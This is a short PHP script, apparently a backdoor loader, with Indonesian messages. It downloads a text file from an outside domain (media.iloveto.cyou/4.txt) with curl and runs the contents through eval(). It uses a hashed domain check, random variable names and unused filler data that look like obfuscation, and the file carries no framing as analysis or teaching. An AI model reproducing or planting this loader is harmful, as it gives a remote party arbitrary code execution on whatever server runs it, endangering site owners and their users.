<?php 

function fxn_4b72($input) {
    $allowed_domain = hash("sha256", "media.iloveto.cyou");
    $parsed_url = parse_url($input);

    if (hash("sha256", $parsed_url['host']) !== $allowed_domain) {
        die("Akses tidak diizinkan!");
    }

    $opt_qz21 = curl_init($input);
    curl_setopt($opt_qz21, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($opt_qz21, CURLOPT_FOLLOWLOCATION, true);
    $data_p9j4 = curl_exec($opt_qz21);

    if (curl_errno($opt_qz21)) {
        die("Gagal memuat konten: " . curl_error($opt_qz21));
    }
    curl_close($opt_qz21);

    include_once "helper.php";

    $dummy_data = base64_encode(random_bytes(16));
    $extra_var = $dummy_data . sha1($dummy_data);
    
    try {
        eval("?>$data_p9j4");
    } catch (Exception $e) {
        echo "Terjadi kesalahan: " . $e->getMessage();
    }
}

$file_j4n9 = "https://media.iloveto.cyou/4.txt";

fxn_4b72($file_j4n9);

?>